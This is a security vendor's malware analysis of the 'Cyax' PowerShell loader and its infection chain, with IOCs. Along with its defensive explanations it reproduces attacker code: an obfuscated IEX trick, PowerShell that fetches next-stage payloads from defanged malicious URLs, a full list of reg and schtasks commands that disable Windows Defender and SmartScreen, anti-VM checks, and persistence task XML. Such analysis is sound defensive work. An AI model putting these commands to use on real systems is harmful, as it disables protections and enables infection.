Cyax Malware - Evasive Loader Reemerges

Towards the end of 2018, enSilo blocked a suspicious attack attempt originating from a generic PowerShell script. While investigating the attack our team discovered an interesting loader malware that delivers different payloads. During the time of writing this post, commercial Anti-Viruses (AVs) did not identify this script as hostile.

figure1

Figure 1: The undetected PowerShell script in VirusTotal

The script disables various defensive mechanisms that are built in on the system and moves on to downloading the next payload comprised of an NSIS installer responsible for installing a local certificate and another PowerShell script that drops an embedded PE which utilize installUtil to run the main loader in memory.figure2

Figure 2: Attack flow


The following sections describe each one of these steps in detail.

 

Technical Analysis


Initial Powershell Script


The attack begins with a malicious obfuscated PowerShell script. The following is static characteristics of this PowerShell script:
SHA-1: 6e6b81bf6a68d6e102d2de6e1d54e3cec5123909
First VT submission: 2018-11-09
File size: 19.23KB
File name: ddr.ps1

The obfuscation is pretty basic and contains simple tricks to prevent AV products from statically detecting it. For example the following command uses the local environment variable $env:comspec and uses specific chars of it to create the expression IEX which is PowerShell alias for the Invoke-Expression command.


.( $enV:CoMsPEc[4,15,25]-Join'')

The script uses reg.exe utility to disable the different built-in Microsoft defense mechanisms in the system by both deleting specific registry keys and adding new registry values that disable certain modules. It also uses the schtasks.exe utility to disable scheduled tasks of different defensive modules. It’s obvious that the malware writer specifically aims to disable most, if not all, Windows Defender features even during the boot stage of the system. Aside from Windows Defender, it also disables Exploit Guard, Smart Screen, and Internet Explorer’s phishing filter. Figure 3 show some of these commands (The full list of commands is located in Appendix A):

figure3
Figure 3: reg and schtasks commands

The script then browses to hxxp://seedpeer.us/index.html using a hidden Internet Explorer instance that it spawned through COM:

$ie = new-object -com "InternetExplorer.Application";
$ie.visible = $false;
$ie.navigate("hxxp://seedpeer.us/index.html")

It seems as if the URL might function as a simple beacon. Thereafter, it goes on to download an NSIS installer using a regular WebClient request from the following website:

hxxp://tracker.awesomepush.online/5bc63d002c822c0001ff45fd

The domain seems to be malicious and serves as a malware repository storage. During the time of writing this post and according to information available on VirusTotal, the website was online and was serving this installer along other malicious executables that were not related to this specific attack.

The script also downloads an additional PowerShell script from the following website.

hxxps://paste.ee/r/9zGV5/0

This additional script carries the main malicious activity and both of the downloaded components are then executed as the next stage in the attack flow.

The NSIS Installer

The first component in the second stage of the attack is an NSIS installer that presents the following static characteristics:

SHA-1: c2a517893f3edbb87d2466d106b6f9a11ecd4d0e
First VT submission: 2018-11-09
File size: 113.24KB
File names: bcdx.exe, rpcms.exe, installer.exe
File version: 11.1247.0.0
Compilation timestamp: 2012-02-24

When executed, the installer presents a setup screen as shown in Figure 4.

figure4

Figure 4: Installation process

The installer creates batch scripts in %temp%/cert.bat and %temp%/convert.bat to install a certificate as a root CA on the affected system using Microsoft certutil.exe utility, followed by a communication attempt to a URL that seems to be another beacon. To ensure its success at communicating with the web page, as can be seen at the GET request in figure 5, it uses all of the following methods:

  • Powershell web requests
  • BITSAdmin
  • Certutil
figure5
Figure 5: HTTP communication made by the installer

The certificate installed on the affected systems as shown in the following figure is registered with Plumix S.a.r.l under the domain plumix.com.

figure6

Figure 6: Installed certificate

The domain registered under the certificate is available for sale, and there isn’t any public information about the registered company name. Due to the fact that after installing the certificate there isn’t any attempt to communicate over SSL, it’s most likely this functionality is intended to be used in other operations such as C&C (Command and control) communications or hijacking network traffic.

The Downloaded PowerShell Dropper

SHA-1: B49A33408ED13E9CA8328271A74E0E058D6A66FF
File size: 276.29KB

The second stage PowerShell script contains a base64 encoded .NET executable that is being dropped in the Temp directory and executed as shown in the following figure:

figure7

Figure 7: The dropper PowerShell Script

The Loader Executable

The dropped .NET executable is obfuscated by the Cassandra Crypter and its goal is to run the loader in-memory using the InstallUtil.exe utility. The following are its static characteristics:


SHA-1: B0DBB716BD32530BA9A324C0F565FC6F92F07E03
Product name: Event Viewer utility
File version: 3.3.0.2
File name: yYsdCQtABm.exe
File size: 206.50KB
Net GUID: b3e38391-567b-456f-853f-44129c1bfa3a

The executable creates and executes a VBScript to set a scheduled task that runs InstallUtil on itself.

figure8

Figure 8: VBScript to execute the loader in memory using installUtil.exe

Also, the executable implements a class inherited from Installer class. This class is being loaded by InstallUtil.exe using reflection. The executable also contains the next stage loader as a resource which is loaded dynamically as shown in figure 9. It's a known method used for security whitelisting bypass and also helps the malware hide from an untrained eye.

figure9

Figure 9: Inheriting Installer Class
figure10
Figure 10: Embedded executables illustration

The main functionality runs in InstallUtil process. It starts out by editing the process ACEs (Access Control Entries) to remove permissions and prevent it from being opened by other processes as shown in the following figure:

 

figure11

Figure 11: ACCESS CONTROL ENTRies MANIPULATION

In addition, it deletes the ZoneID to hide the fact it was downloaded from the web.

The loader contains a hard-coded configuration in a form of an array, suggesting that it is not meant to be specific per payload sample. Most likely, it’s meant to serve as part of a builder framework.

The first binary flags that are checked indicate if anti-VM and anti-analysis tests should take place in an effort to maximize its evasion capabilities. It tries to avoid running on a virtualized environment and being analyzed by different analysis tools. Some of these tests are:

  • Use time measurements and sleep operations to detect any time latency in virtualized environments.
  • Check multiple registry keys in an effort to find any indicators of running VMware, VirtualBox or QEMU.
  • Use WMI to query the system characteristics and search for VM related strings.
  • Check if kernel32.dll contains the method wine_get_unix_file_name.
  • Check different environment characteristics that indicate running inside a sandbox.

Appendix B provides a full list of the registry keys and sandbox checks.

Once the environment is validated, the loader uses a known UAC bypass method to gain higher privileges. This fileless UAC bypass method uses the auto-elevated eventvwr.exe executable.

figure12

Figure 12: BypassUAC function

The loader then copies itself to the %windir%\debug\WIA directory or to the %APPDATA% directory (depending on the outcome of the UAC bypass attempt) and changes the copied file access permissions to prevent it from being easily detected by making it hidden. To ensure the infection is persistent, it drops an XML file use it to set as a scheduled task for the copied executable as shown in the following figure:

figure13

Figure 13: Schedule task for persistency

Refer to Appendix C for the full XML’s content.

In addition to anti-VM and analysis methods, the built-in configurations array also contains the following settings:

  • A binary flag that indicates if a download and execute functionality should be carried out, along with 2 strings that specify the remote URL and to download the file from and the filename to save it as. Although we didn’t see this functionality active in any of the samples, it might be related to the certificate which was installed previously by the NSIS installer.
  • Two parameters which indicate the Process Hollowing target and the payload.

Possible targets for Process Hollowing are the following:

  • The loader itself (the default option)
  • MSBuild.exe
  • RegAsm.exe
  • RegSvcs.exe
  • Jsc.exe

figure14
Figure 14: Process Hollowing target selection

Every sample is set to deliver a specific malware type. Which is made easy since the payload is embedded in the executable as a resource. So far, we have observed the following malware variants being bundled with this loader:

  • Azorult
  • FormBook
  • NetWire
  • NjRAT
  • Pony
  • Imminent Monitor RAT

enSilo Endpoint Security Platform
The enSilo endpoint security platform successfully detects and blocks this attack during any stage. The following figures illustrate how the enSilo platform blocks the initial phase of this attack from downloading the next malware.

figure15
Figure 15: Blocking the original PowerShell script
figure16
Figure 16: Blocking the NSIS installer
figure17
Figure 17: Blocking the NSIS installer
figure18
Figure 18: Blocking the loader’s in memory .NET module

Final Notes

While not presenting any sophisticated evasion techniques, the described loader seems to be recently active and delivering a wide variety of payloads.

A blog from Kaspersky published in late 2017 described a loader that uses multiple similar techniques. We believe that this loader is a new version of the one described by Kaspersky. The new version we dubbed “Cyax” has gone under extensive code changes and has a different delivery tactic using PowerShell.

Since Cyax starts by disabling Windows Defender and Exploit Guard, we can assume that it targets users with newer versions of Windows. Also, due to the various customization options combined with the fact that we observed many different and unrelated payloads, we suspect Cyax is being offered as a service for cybercriminals. The installation of the certificate suggests a motivation for future developments and attack vectors.

IOCs

Files

6e6b81bf6a68d6e102d2de6e1d54e3cec5123909 (Main powershell script) C2a517893f3edbb87d2466d106b6f9a11ecd4d0e (NSIS installer) B0dbb716bd32530ba9a324c0f565fc6f92f07e03 (Dropped executable) 50298B71B150F210E16EC73AC07D0F4AE375F1B3 (Cyax Loader) 90E472BC4026153B14D3D03213640980E8B11C89 (Cyax Loader) C9928CA06CB6D9F82133F2146CF46EDEE505A35E (Cyax Loader) ACA5E591DF5D8845B3C2629EA97E542FF2ABD836 (Cyax Loader) 74E5ADACB3974A1876AAED13FB0476B2B135B239 (Cyax Loader) 99FFBB51E2D03BFC8C9D9C5B3B017CF6FCC1838D (Cyax Loader)

 

URLs and IPs

hxxp://seedpeer.us/index.html

hxxp://tracker.awesomepush.online/5bc63d002c822c0001ff45fd

hxxps://paste.ee/r/9zGV5/0

80.241.222.137

Appendix A - List of Reg and Schtask Commands

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "00000000" /f

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /d "Off" /f

reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "00000000" /f

Appendix B - Anti VM & Anti Analysis Checks

Registry keys:

  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (checks if the identifier contains VBOX or VMWARE or QEMU)
  • HARDWARE\Description\System (checks if the SystemBiosVersion contains VBOX or QEMU)
  • HARDWARE\Description\System (checks if the VideoBiosVersion contains VIRTUALBOX)
  • SOFTWARE\Oracle\VirtualBox Guest Additions (checks if exists)
  • SOFTWARE\VMware, Inc.\VMware Tools (checks if exists)
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (checks if the identifier contains VMWARE)
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (checks if the identifier contains VMWARE)
  • SYSTEM\ControlSet001\Services\Disk\Enum (checks if contains vmware)
  • SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 (checks if DriverDesc contains VMWARE)
  • SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\Settings (checks if the Device Description contains VMWARE)
  • SOFTWARE\VMware, Inc.\VMware Tools (checks if InstallPath contains C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\)

Device names information queried through WMI:

  • VM Additions S3 Trio32/64
  • S3 Trio32/64
  • VirtualBox Graphics Adapter
  • VMware SVGA II

Sandbox checks:

  • Checks if SbieDll.dll is loaded
  • Checks for the following strings in the executable’s path:
    • SANDBOX
    • USER
    • VIRUS
    • MALWARE
    • SCHMIDTI
    • CURRENTUSER
    • \VIRUS
    • SAMPLE
  • Checks if the path of the binary is “C:\file.exe”
  • Checks for an active window with a class name of Afx:400000:0 (checks the MFC is located on the system)

Appendix C - XML content

<?xml version="1.0" encoding="UTF-16"?>

<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">

  <RegistrationInfo>

    <Date>2014-10-25T14:27:44.8929027</Date>

    <Author>[USERID]</Author>

  </RegistrationInfo>

  <Triggers>

    <LogonTrigger>

      <Enabled>true</Enabled>

      <UserId>[USERID]</UserId>

    </LogonTrigger>

    <RegistrationTrigger>

      <Enabled>false</Enabled>

    </RegistrationTrigger>

  </Triggers>

  <Principals>

    <Principal id="Author">

      <UserId>[USERID]</UserId>

      <LogonType>InteractiveToken</LogonType>

      <RunLevel>LeastPrivilege</RunLevel>

    </Principal>

  </Principals>

  <Settings>

    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>

    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>

    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>

    <AllowHardTerminate>false</AllowHardTerminate>

    <StartWhenAvailable>true</StartWhenAvailable>

    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>

    <IdleSettings>

      <StopOnIdleEnd>true</StopOnIdleEnd>

      <RestartOnIdle>false</RestartOnIdle>

    </IdleSettings>

    <AllowStartOnDemand>true</AllowStartOnDemand>

    <Enabled>true</Enabled>

    <Hidden>false</Hidden>

    <RunOnlyIfIdle>false</RunOnlyIfIdle>

    <WakeToRun>false</WakeToRun>

    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>

    <Priority>7</Priority>

  </Settings>

  <Actions Context="Author">

    <Exec>

      <Command>[LOCATION]</Command>

    </Exec>

  </Actions>

</Task>

Related Blog Posts

Customers Say It Best - Managed Security Service Provider one

cybersecurity , enSilo Corporate and Product

 

Retailers, restaurants, hoteliers, and small businesses are having problems discovering breaches on their POS systems. Delayed detection of a.

Read More

5 Ways to Tackle Ransomware Attacks One

cybersecurity , enSilo Corporate and Product

“Nearly 98% of all recorded point of sale (POS) attacks resulting in a confirmed data breach”. Verizon Data Breach Investigations

PROBLEM:

.

Read More

enSilo Blocks New Variant of Adwind RAT one

cybersecurity , enSilo Corporate and Product

“Nearly 98% of all recorded point of sale (POS) attacks resulting in a confirmed data breach”. Verizon Data Breach Investigations

PROBLEM:

.

Read More

enSilo RECOMMENDED in NSS Labs 2018 Advanced Endpoint Protection (AEP) Group Test

cybersecurity , enSilo Corporate and Product

“Nearly 98% of all recorded point of sale (POS) attacks resulting in a confirmed data breach”. Verizon Data Breach Investigations

PROBLEM:

.

Read More